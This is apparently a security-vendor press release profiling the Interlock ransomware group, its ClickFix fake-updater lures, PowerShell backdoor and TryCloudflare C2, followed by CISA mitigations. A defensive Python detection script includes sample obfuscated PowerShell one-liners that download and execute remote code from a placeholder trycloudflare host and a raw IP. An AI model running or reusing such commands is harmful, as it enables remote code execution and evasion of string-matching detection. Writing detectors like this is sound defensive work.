
Threat actor profile: Interlock ransomware

Johannesburg, 01 Sep 2025
Arctic Wolf examines Interlock’s most common attack methods and provides tips on how to protect your organisation.

A relatively new threat group, Interlock, has gained traction in 2025 as an opportunistic ransomware operator. In this press release, Arctic Wolf examines Interlock’s most common attack methods and provides tips on how to protect your organisation.

Executive summary

A relatively new ransomware group, Interlock has gained traction in 2025 as an opportunistic ransomware operator that leverages compromised websites and multi-stage social engineering techniques to deliver its payloads.

First observed in September 2024, Interlock departs from the traditional ransomware-as-a-service (RaaS) model, operating without affiliates or public advertisements. The financially motivated group conducts opportunistic double extortion campaigns, relying on a private infrastructure and a custom leak site – “Worldwide Secrets Blog" – to pressure victims with the threat of publicly exposing sensitive data.

Key points

  • Interlock is an opportunistic ransomware actor, known for obtaining initial access via compromised websites and social engineering techniques.
  • In August 2025, Interlock claimed responsibility for the July 2025 ransomware attack against the City of St Paul, Minnesota.
  • Interlock makes frequent use of the “ClickFix” technique, where unwitting targets are sent to compromised websites and asked to “prove they are human” by pressing keys that (unbeknownst to them) cause their device to download malware such as remote access trojans (RATs).
  • Interlock carries out double extortion attacks, first exfiltrating then encrypting data. Targets who do not pay the ransom are posted on their leak site, typically with the name of the victim, amount of data stolen, number of files and folders, and a link to the victim’s website (if applicable).

What is Interlock ransomware?

The Interlock ransomware group (also known as Nefarious Mantis) was first observed in September 2024 and has emerged as a high priority threat in recent months. Over the past 11 months, it has targeted businesses and critical infrastructure sectors across North America and Europe, including education, healthcare, technology and government entities. In June 2025, the US Cybersecurity and Infrastructure Security Agency (CISA) and FBI warned of increased Interlock ransomware activity.

The group is financially motivated, and according to the FBI, is opportunistic when selecting targets. Unlike many modern ransomware groups, Interlock does not follow a typical RaaS model and likely operates as a closed group.

Historically, Interlock ransomware has obtained initial access via drive-by downloads from compromised legitimate websites, an infection chain not typically associated with ransomware actors. In May 2025, the group added the ClickFix social engineering technique to its arsenal.

Interlock’s encryption payload is typically deployed across virtual machines, leaving hosts, workstations and physical servers unaffected.

Open source reporting has detailed similarities between the Rhysida and Interlock ransomware variants. CISA’s advisory on Rhysida can be found here. There is evidence to suggest that Interlock may have emerged as a spinoff group from Rhysida, although this has not been definitively proven to date.

Recent Interlock attacks

On 22 July 2025, CISA and the FBI, in combination with other federal agencies, issued a joint advisory warning that Interlock had recently upgraded its malware, making it more resistant to detection. The advisory cautioned that the FBI had “encountered Interlock ransomware encryptors designed for both Windows and Linux operating systems”, and that these encryptors have been observed encrypting virtual machines (VMs) across both operating systems.

To date, at least 58 known victims have been posted to Interlock’s leak site. The highest-impact attack to date was the DaVita breach in April 2025, in which 1.5 terabytes of data were stolen, affecting 200 000+ patients of the kidney dialysis service provider.

On 11 August 2025, Interlock claimed responsibility for the July 2025 ransomware attack on the city of St Paul, Minnesota, which took key city systems offline and put the personal data of 3 500 city employees potentially at risk. Ten days prior to the attack, cyber threat intelligence company PRODAFT claimed it had detected Interlock pre-attack activity in the city’s systems, warning on X (formerly Twitter) that this activity had a “certain likelihood of spreading”. The city has since confirmed the attack was perpetrated by Interlock, but stated it did not pay the ransom demand.

In a recent interview with Fox 9 Minneapolis-St Paul news (KMSP-TV), Arctic Wolf President of Technology and Services, Dan Schiappa, spoke about how the St Paul attack could have occurred.

“Typically, these ransomware groups try and go after infrastructure [because] they get the most ransomware dollars out of that. This is typically something that a hacking group would do reconnaissance on – they understand the value of the data. They would find the weak points in the ecosystem, then once they’ve gathered all that information, they launch the campaign. We have to take these types of attacks very seriously.”

Interlock attack chain analysis

To gain an initial foothold, the Interlock ransomware group utilises the increasingly common trend of combining stealthy, user-initiated infection chains with living-off-the-land (LOTL) techniques. Variations on this technique, including ClickFix and FileFix, typically use legitimate activity to mask malicious behaviour, aiming to evade traditional endpoint detection solutions and network monitoring tools.

One of the reasons why this type of threat activity is so effective is that the malicious instructions are hosted on compromised websites that are often already trusted by victims, making them more likely to follow through on installing the malware when prompted.

Initial access

Interlock employs deceptive tactics to deliver its initial payloads, most notably via the use of fake software updaters hosted on compromised websites. These are crafted using PyInstaller to mimic legitimate software like Google Chrome or Microsoft Edge.

When a user manually follows the instructions shown on one of these fake update websites, a legitimate installer for Chrome or Edge runs as a decoy, while a malicious PowerShell script is silently run in the background. The script acts as a first-stage backdoor, persistently communicating with command-and-control (C2) servers, gathering detailed system information and enabling follow-on activity.

This is a social engineering technique commonly referred to as ClickFix, which relies on users being tricked by threat actors into running malicious commands, often under the pretext of updating existing software. False dialogue boxes instruct the user to use popular Windows shortcuts such as “Windows + R” (run) then “CTRL + V” (paste) to unwittingly paste and run harmful PowerShell commands, thus circumventing traditional security defences and compromising their own systems.

The use of this ClickFix technique has been observed in several other malware campaigns, including those by Lumma Stealer (aka LummaC2 stealer), AsyncRAT, DanaBot and DarkGate.

Figure 1: ClickFix fake updater dialogue prompts users to manually execute PowerShell command. (Source: Sekoia.io)

Execution and obfuscation

Once manually executed by victims, the PowerShell backdoor operates stealthily, running in the background by relaunching itself in a detached mode to avoid detection by the user. It continuously polls remote hosts using HTTP requests, with fallback mechanisms between domains and IP addresses.

A significant amount of variation has been observed among the PowerShell commands executed in recent ClickFix social engineering campaigns, often employing techniques to evade detections that rely on string matching. Obfuscation techniques include the use of character codes, plus characters, caret characters and asterisk characters. Most often, these commands make use of built-in download and execution functions like Invoke-RestMethod, Invoke-Expression and their corresponding aliases. Malicious URLs in these commands use malicious domains, legitimate domains used maliciously such as trycloudflare.com, and IPv4 addresses directly.

The backdoor collects data such as system information, user privileges, running processes, services and network configuration, which it obfuscates and compresses before exfiltrating to a designated C2 endpoint. The C2 can then issue commands, including delivering executable or DLL payloads, which are decoded and saved locally. Interlock has historically used multiple tools, including Cobalt Strike, Interlock RAT, NodeSnake RAT and SystemBC for C2 communication and command execution.

Figure 2: Example of a malicious PowerShell script, which victims are tricked into executing.

Persistence is established in later script versions (up to v11) through Windows registry keys, and the script can receive and execute arbitrary commands from the threat actor.

All known C2 infrastructure used by this backdoor abuses Cloudflare’s “TryCloudflare” tunneling tool, using dynamically generated subdomains to obfuscate traffic and evade traditional detection methods. Developers commonly use TryCloudflare to experiment with Cloudflare Tunnel without adding a site to Cloudflare’s DNS, but it has been used in the past to deliver malware. These dynamic and ephemeral domains appear legitimate and act as temporary proxies, making it more difficult to trace or block malicious communication.

This misuse of trusted platforms highlights a growing trend among more sophisticated actors to blend in with legitimate services, challenging defenders’ ability to distinguish malicious traffic from benign.
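As an added illustration of how a defender can turn the obfuscation methods and the TryCloudflare C2 pattern described in the two passages above into a detection, the following Python script normalises a PowerShell command line as recorded in a process-creation log and flags the indicators. This is example code, not Arctic Wolf’s detection logic; the sample command lines, domain names and IP addresses are constructed, not observed IoCs.

```python
import ipaddress
import re

DOWNLOAD_EXEC = re.compile(r"\b(invoke-restmethod|irm|invoke-webrequest|iwr|invoke-expression|iex)\b", re.I)
URL_HOST = re.compile(r"https?://([^\s'\"/)]+)", re.I)
CHAR_CODE = re.compile(r"\[char\]\s*(\d{1,3})", re.I)          # [char]105 -> 'i'
PLUS_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")          # 'a'+'b' -> 'ab'
OBFUSCATION = [("caret", re.compile(r"\^")), ("char-code", CHAR_CODE),
               ("plus-concat", PLUS_CONCAT),
               ("wildcard", re.compile(r"\b(gcm|get-command)\s+\S*\*", re.I))]

def normalise(cmd):
    """Record which obfuscation layers are present, then undo the reversible ones."""
    flags = [name for name, pat in OBFUSCATION if pat.search(cmd)]
    cmd = cmd.replace("^", "")                       # i^e^x -> iex (cmd.exe strips escape carets)
    cmd = CHAR_CODE.sub(lambda m: "'%s'" % chr(int(m.group(1))), cmd)
    while PLUS_CONCAT.search(cmd):                   # collapse chained '..'+'..' pieces
        cmd = PLUS_CONCAT.sub(lambda m: "'%s%s'" % (m.group(1), m.group(2)), cmd)
    return cmd, flags

def analyse(cmdline):
    """Return (suspicious, indicators) for one powershell.exe command line."""
    norm, indicators = normalise(cmdline)
    if DOWNLOAD_EXEC.search(norm):
        indicators.append("download-exec")
    for host in URL_HOST.findall(norm):
        host = host.split(":")[0].lower()
        if host.endswith(".trycloudflare.com"):
            indicators.append("trycloudflare")
        else:
            try:
                ipaddress.IPv4Address(host)
                indicators.append("raw-ip")
            except ValueError:
                pass
    # Download/execute alone is routine admin use; alert only when an evasion or infrastructure indicator accompanies it.
    return "download-exec" in indicators and len(indicators) > 1, indicators

# Constructed sample command lines (not real IoCs), as a process-creation log would record them.
SAMPLES = [
    "powershell -w hidden -c \"i^e^x (i^r^m ('https://'+'words.trycloudflare.com'+'/p'))\"",
    'powershell -nop -c "& ([char]105+[char]101+[char]120) (Invoke-RestMethod http://203.0.113.10/x)"',
    'powershell -c "Invoke-RestMethod https://intranet.example.internal/health"',
    'powershell -c "Get-ChildItem C:\\Temp"',
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(analyse(line), line)
```

The third sample shows why the rule requires a second indicator: an unobfuscated Invoke-RestMethod against an internal host is common administrative activity and should not page anyone on its own.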

Detection evasion

Recent observations confirm that Interlock has incorporated a custom PowerShell-based remote access trojan (RAT) into its initial access toolkit, delivered via fake software updaters hosted on compromised websites. The PowerShell RAT operates persistently in detached mode without a visible window, collecting detailed host data and enabling remote command execution and payload delivery.

Figure 3: Interlock’s leak site, “Worldwide Secrets Blog”.
Figure 4: On 11 August 2025, the City of Saint Paul was officially listed on Interlock’s leak site.

How Arctic Wolf protects its customers

When active campaigns are identified, Arctic Wolf moves quickly to protect its customers. Arctic Wolf Labs has leveraged threat intelligence around Interlock’s activity to implement new detections in the Arctic Wolf Aurora Platform to protect customers.

As Arctic Wolf discovers new information, it will enhance its detections to account for additional IOCs and techniques leveraged by this threat group.

Arctic Wolf's commitment to the fight against ransomware

Arctic Wolf is committed to the fight against ransomware, and as such, it is proud to stand alongside the 68 members of the International Counter Ransomware Initiative (CRI), the world’s largest international cyber partnership. As a global leader in security operations, Arctic Wolf’s mission is to help protect governments, businesses and safety-critical institutions of all sizes from cyber threats.

Arctic Wolf is delighted to have been selected to co-chair the CRI’s new Public-Private Sector Advisory Panel, led by Public Safety Canada, which establishes a trusted set of private sector partners for CRI members to rely on when responding to ransomware attacks.

Arctic Wolf looks forward to collaborating with CRI members in combating ransomware by catalysing effective information sharing, building trust through clear expectations and person-to-person collaboration, and developing best practices to navigate practical hurdles to combating ransomware.

Conclusion

Though not the newest ransomware group within the threat landscape, Interlock’s steady rise to prominence over the course of 2025 means that organisations should take heed of CISA’s warnings and implement their mitigation suggestions, which are outlined in Arctic Wolf's 'Recommendations' section below.

The proliferation of the Interlock RAT malware delivered through compromised websites earned the group enough notoriety to warrant a warning from CISA and the FBI in June; the group’s most recent attack on the City of Saint Paul represents a direct escalation of this trend. It indicates the group is becoming confident enough in its activities to go after targets it feels can pay out higher-dollar ransom demands, even if that means endangering vital city infrastructure.

From a defensive standpoint, Arctic Wolf will continue to actively monitor this group for further cyber security threats. Financially driven groups like Interlock value impact and disruption as their main goals, with few qualms in targeting both private and government entities in the hopes of securing a large payout. It’s highly likely the group will continue targeting high-profile organisations for financial gain in the coming months.

Recommendations

While user training to help employees detect the red flags of a social engineering attack is a good place to start mitigating this threat, the reality is that even the most security-conscious users still can – and do – fall victim to these types of attacks.

To provide a solid baseline of security to guard against the type of attacks perpetrated by opportunistic threat actors like Interlock, the following recommendations from CISA will go a long way in defending your organisation:

  • Prevent initial access by implementing domain name system (DNS) filtering and web access firewalls, and training users to spot phishing attempts.
  • Block tunnelling tools and domains related to services such as TryCloudflare in environments where they are not used for operational purposes.
  • Mitigate known vulnerabilities by ensuring operating systems, software and firmware are patched and up to date.
  • Segment networks wherever possible to restrict lateral movement from initial infected devices to other devices in the same organisation.
  • Implement identity, credential and access management (ICAM) policies across the organisation.
  • Have an incident response (IR) plan ready and ensure you have an incident response group that you can reach out to or enable should the need arise.
  • Endpoint detection and response (EDR) platforms can uncover hidden red flags of intrusion and can even prevent attackers from gaining an initial foothold in the first place. Consider implementing enterprise solutions such as Arctic Wolf Aurora Endpoint Defense.
  • Require multi-factor authentication (MFA) for all services, particularly for webmail, VPN and accounts that access critical systems.
  • Check out Arctic Wolf's recommendations on how to defend your organisation against Interlock’s FileFix delivery method in the company's latest blog.

A complimentary ITWeb webinar will be brought to you in partnership with Arctic Wolf on 9 September 2025 | Online.

Join Arctic Wolf to discover how a managed, AI-powered endpoint solution can cut through the noise, stop advanced threats before they spread and keep your business safe, today and into the future. 
